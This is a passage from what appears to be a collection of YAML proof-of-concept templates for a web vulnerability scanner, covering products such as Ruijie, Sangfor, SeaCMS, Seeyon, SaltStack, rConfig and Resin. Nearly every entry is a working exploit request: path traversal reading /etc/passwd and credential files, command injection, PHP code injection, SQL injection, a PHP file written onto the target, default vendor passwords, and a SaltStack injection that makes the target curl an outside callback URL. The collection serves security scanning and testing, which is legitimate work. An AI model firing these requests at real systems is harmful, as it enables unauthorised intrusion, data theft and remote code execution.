longer under a load path: (?P.*?),' 9 | - method: GET 10 | path: >- 11 | /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: leezp 17 | Affected Version: "Sprockets<=3.7.1" 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/razor-cve-2018-8770.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-razor-cve-2018-8770 2 | rules: 3 | - method: GET 4 | path: /tests/generate.php 5 | follow_redirects: 
false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line") 8 | detail: 9 | author: we1x4n(https://we1x4n.github.io/) 10 | links: 11 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 12 | - https://www.exploit-db.com/exploits/44495/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/rconfig-cve-2019-16663.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rconfig-cve-2019-16663 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: 17bdw 12 | links: 13 | - https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071 14 | - https://www.cnblogs.com/17bdw/p/11840588.html 15 | - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ -------------------------------------------------------------------------------- /src/plugins/pocs/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | rules: 3 | - method: GET 4 | path: /%20../web-inf/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/39144.html 12 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 
-------------------------------------------------------------------------------- /src/plugins/pocs/resin-inputfile-fileread-or-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-inputfile-fileread-or-ssrf 2 | rules: 3 | - method: GET 4 | path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/496.html -------------------------------------------------------------------------------- /src/plugins/pocs/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | rules: 3 | - method: GET 4 | path: /resin-doc/viewfile/?file=index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 12 | - http://0day5.com/archives/1173/ -------------------------------------------------------------------------------- /src/plugins/pocs/rockmongo-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rockmongo-default-password 2 | rules: 3 | - method: POST 4 | path: /index.php?action=login.index&host=0 5 | body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 6 | follow_redirects: false 7 | expression: | 8 | response.status == 302 && response.headers["Location"] == "/index.php?action=admin.index&host=0" 9 | detail: 10 | author: 
B1anda0(https://github.com/B1anda0) 11 | links: 12 | - https://www.runoob.com/mongodb/working-with-rockmongo.html -------------------------------------------------------------------------------- /src/plugins/pocs/ruijie-eweb-rce-cnvd-2021-09650.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-eweb-rce-cnvd-2021-09650 2 | set: 3 | r1: randomLowercase(4) 4 | r2: randomLowercase(4) 5 | phpcode: > 6 | "" 7 | payload: base64(phpcode) 8 | rules: 9 | - method: POST 10 | path: /guest_auth/guestIsUp.php 11 | body: | 12 | ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 13 | expression: | 14 | response.status == 200 15 | - method: GET 16 | path: /guest_auth/{{r2}}.php 17 | expression: | 18 | response.status == 200 && response.body.bcontains(bytes(r1)) 19 | detail: 20 | author: White(https://github.com/WhiteHSBG) 21 | links: 22 | - https://xz.aliyun.com/t/9016?page=1 23 | - https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/ 24 | -------------------------------------------------------------------------------- /src/plugins/pocs/ruijie-nbr1300g-cli-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-nbr1300g-cli-password-leak 2 | rules: 3 | - method: POST 4 | path: /WEB_VMS/LEVEL15/ 5 | follow_redirects: false 6 | headers: 7 | Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 8 | body: | 9 | command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. 
10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest")) 12 | detail: 13 | author: abbin777 14 | links: 15 | - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/ruijie-uac-cnvd-2021-14536.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-uac-cnvd-2021-14536 2 | rules: 3 | - method: GET 4 | path: /login.php 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) 8 | detail: 9 | author: jweny(https://github.com/jweny) 10 | links: 11 | - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/saltstack-cve-2020-16846.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-saltstack-cve-2020-16846 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | 6 | rules: 7 | - method: POST 8 | path: /run 9 | body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b 10 | expression: | 11 | reverse.wait(5) 12 | 13 | detail: 14 | author: we1x4n(https://we1x4n.com/) 15 | links: 16 | - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag 17 | - https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md 18 | -------------------------------------------------------------------------------- 
/src/plugins/pocs/samsung-wea453e-default-pwd.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-default-pwd 2 | rules: 3 | - method: POST 4 | path: /main.ehp 5 | follow_redirects: false 6 | body: | 7 | httpd;General;lang=en&login_id=root&login_pw=sweap12~ 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp")) 10 | detail: 11 | author: sharecast 12 | links: 13 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/samsung-wea453e-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: POST 7 | path: /(download)/tmp/1.txt 8 | follow_redirects: false 9 | body: | 10 | command1=shell%3Aexpr {{r1}} - {{r2}}|dd of=/tmp/1.txt 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-ad-download.php-filedownload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-ad-download.php-filedownload 2 | rules: 3 | - method: GET 4 | path: /report/download.php?pdf=../../../../../etc/hosts 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b'localhost') && response.headers['Content-Disposition'].contains('hosts') 8 | 9 | detail: 10 | author: PeiQi0 11 | links: 12 | - 
https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md 13 | tags: sangfor,file,download 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-ba-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-ba-rce 2 | set: 3 | r1: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: /tool/log/c.php?strip_slashes=md5&host={{r1}} 7 | expression: | 8 | response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(bytes(md5(r1))) 9 | 10 | detail: 11 | author: Print1n(http://print1n.top) 12 | links: 13 | - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | rules: 3 | - method: GET 4 | path: /ui/login.php?user=admin 5 | follow_redirects: false 6 | expression: > 7 | response.status == 302 && 8 | response.body.bcontains(b"/download/edr_installer_") && 9 | response.headers["Set-Cookie"] != "" 10 | detail: 11 | author: hilson 12 | links: 13 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-edr-cssp-rce.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-sangfor-edr-cssp-rce 2 | rules: 3 | - method: POST 4 | path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | {"params":"w=123\"'1234123'\"|id"} 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" 14 | links: 15 | - https://www.cnblogs.com/0day-li/p/13650452.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | set: 3 | r1: randomLowercase(8) 4 | r2: randomLowercase(8) 5 | rules: 6 | - method: GET 7 | path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 11 | detail: 12 | author: cookie 13 | links: 14 | - https://edr.sangfor.com.cn/ 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/satellian-cve-2020-7980-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-satellian-cve-2020-7980-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: >- 8 | /cgi-bin/libagent.cgi?type=J 9 | headers: 10 | Cookie: ctr_t=0; sid=123456789 11 | Content-Type: application/json 12 | body: >- 13 | {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1} 14 | follow_redirects: true 15 | expression: response.body.bcontains(bytes(string(r1 + r2))) 16 | detail: 17 | author: JingLing(https://hackfun.org/) 18 | Affected version: Intellian Aptus Web <= 
1.24 19 | links: 20 | - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-before-v992-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-before-v992-rce 2 | set: 3 | r1: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: "/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E" 7 | expression: | 8 | response.status == 200 9 | - method: GET 10 | path: "/data/mysqli_error_trace.php?_=printf(md5(\"{{r1}}\"))%3B" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(r1))) 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://www.zhihuifly.com/t/topic/3118 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/search.php?print({{r}}%2b{{r1}})" 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/* 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 14 | detail: 15 | author: neverendxxxxxx(https://github.com/neverendxxxxxx),violin 16 | seacms: v6.55 17 | links: 18 | - https://www.jianshu.com/p/8d878330a42f 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | 
rules: 3 | - method: GET 4 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://www.uedbox.com/post/54561/ 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/seacms-v654-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-v654-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /search.php 7 | body: >- 8 | searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf(md5({{rand}})); 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 12 | detail: 13 | links: 14 | - http://0day5.com/archives/4249/ 15 | - https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/ -------------------------------------------------------------------------------- /src/plugins/pocs/seacmsv645-command-exec.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacmsv645-command-exec 2 | set: 3 | rand1: randomInt(200000000, 210000000) 4 | rand2: randomInt(200000000, 210000000) 5 | rules: 6 | - method: POST 7 | path: /search.php?searchtype=5 8 | body: searchtype=5&order=}{end if} {if:1)print({{rand1}}%2b{{rand2}});if(1}{end if} 9 | expression: | 10 | response.body.bcontains(bytes(string(rand1 + rand2))) 11 | detail: 12 | author: Facker007(https://github.com/Facker007) 13 | links: 14 | - 
https://www.cnblogs.com/ffx1/p/12653597.html 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/secnet-ac-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-secnet-ac-default-password 2 | rules: 3 | - method: GET 4 | path: /login.html 5 | expression: response.status == 200 && response.body.bcontains(b"安网科技-智能路由系统") 6 | 7 | - method: POST 8 | path: /login.cgi 9 | body: 10 | user=admin&password=admin 11 | expression: response.status == 200 && response.headers["Set-Cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_") 12 | detail: 13 | author: iak3ec(https://github.com/nu0l) 14 | links: 15 | - https://bbs.secnet.cn/post/t-30 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-a6-employee-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-employee-info-leak 2 | groups: 3 | poc1: 4 | - method: GET 5 | path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 6 | expression: 7 | response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") 8 | detail: 9 | author: sakura404x 10 | version: 致远A6 11 | links: 12 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-a6-test-jsp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-test-jsp-sql 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) 7 | expression: 8 | response.status == 200 && 
response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: sakura404x 11 | version: 致远A6 12 | links: 13 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-ajax-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-ajax-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /seeyon/thirdpartyController.do.css/..;/ajax.do 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) 7 | - method: GET 8 | path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") 11 | 12 | detail: 13 | author: x1n9Qi8 14 | links: 15 | - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA 16 | - https://buaq.net/go-53721.html 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-cnvd-2020-62422-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-cnvd-2020-62422-readfile 2 | rules: 3 | - method: GET 4 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 5 | follow_redirects: false 6 | expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") 7 | detail: 8 | author: Aquilao(https://github.com/Aquilao) 9 | info: seeyon readfile(CNVD-2020-62422) 10 | links: 11 | - 
https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-oa-a8-m-information-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-oa-a8-m-information-disclosure 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /seeyon/management/index.jsp 7 | expression: response.status == 200 8 | - method: POST 9 | path: /seeyon/management/index.jsp 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded 12 | body: password=WLCCYBD%40SEEYON 13 | follow_redirects: true 14 | expression: response.status == 200 && response.body.bcontains(bytes("Free Physical Memory Size")) 15 | detail: 16 | author: Monday 17 | links: 18 | - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-oa-cookie-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-oa-cookie-leak 2 | rules: 3 | - method: POST 4 | path: /seeyon/thirdpartyController.do 5 | body: | 6 | method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1 7 | expression: | 8 | response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"/seeyon/common/") 9 | - method: GET 10 | path: /seeyon/main.do?method=headerjs 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"id\":\"-7273032013234748168\"") 13 | detail: 14 | author: Print1n(http://print1n.top) 15 | links: 16 | - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg 17 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-session-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-session-leak 2 | rules: 3 | - method: GET 4 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll 5 | expression: 6 | response.status == 200 && response.body.bcontains(b"\r\n\r\n") 7 | detail: 8 | author: sakura404x 9 | links: 10 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-setextno-jsp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-setextno-jsp-sql 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23 7 | expression: 8 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: sakura404x 11 | version: 致远A6 12 | links: 13 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-unauthoried.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-unauthoried 2 | rules: 3 | - method: POST 4 | path: "/seeyon/thirdpartyController.do" 5 | expression: "true" 6 | body: | 7 | method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 8 | search: >- 9 | JSESSIONID=(?P.+?) 
10 | - method: GET 11 | path: "/seeyon/main.do" 12 | headers: 13 | Cookie: JSESSIONID={{session}} 14 | expression: | 15 | response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户") 16 | detail: 17 | author: whami-root(https://github.com/whami-root) 18 | links: 19 | - https://github.com/whami-root -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/seeyon-wooyun-2015-148227.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-148227 2 | rules: 3 | - method: GET 4 | path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(bytes("NCInvokerServlet")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | links: 11 | - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/shiziyu-cms-apicontroller-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shiziyu-cms-apicontroller-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | 
path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1) 7 | expression: 8 | response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 9 | detail: 10 | author: sakura404x 11 | links: 12 | - https://blog.csdn.net/weixin_42633229/article/details/117070546 -------------------------------------------------------------------------------- /src/plugins/pocs/shopxo-cnvd-2021-15822.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shopxo-cnvd-2021-15822 2 | groups: 3 | Linux: 4 | - method: GET 5 | path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | Windows: 10 | - method: GET 11 | path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"for 16-bit app support") 15 | detail: 16 | author: Print1n(http://print1n.top) 17 | description: ShopXO download 任意文件读取 18 | links: 19 | - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/showdoc-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-showdoc-default-password 2 | rules: 3 | - method: POST 4 | path: /server/index.php?s=/api/user/login 5 | body: username=showdoc&password=123456 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token") 9 | detail: 10 | author: B1anda0(https://github.com/B1anda0) 11 | links: 12 | - https://blog.star7th.com/2016/05/2007.html 
-------------------------------------------------------------------------------- /src/plugins/pocs/skywalking-cve-2020-9483-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-skywalking-cve-2020-9483-sqli 2 | set: 3 | r1: randomInt(10000, 99999) 4 | rules: 5 | - method: POST 6 | path: "/graphql" 7 | headers: 8 | Content-Type: application/json 9 | body: | 10 | {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','{{r1}}','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}} 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes("~" + string(r1) + "~")) 13 | detail: 14 | author: sndav(https://github.com/Sndav) 15 | links: 16 | - https://paper.seebug.org/1485/ -------------------------------------------------------------------------------- /src/plugins/pocs/solarwinds-cve-2020-10148.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solarwinds-cve-2020-10148 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /web.config.i18n.ashx?l=en-US&v={{r1}} 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl")) 9 | detail: 10 | author: su(https://suzzz112113.github.io/#blog) 11 | CVE: CVE-2020-10148 12 | links: 13 | - https://kb.cert.org/vuls/id/843464 -------------------------------------------------------------------------------- /src/plugins/pocs/solr-cve-2017-12629-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solr-cve-2017-12629-xxe 2 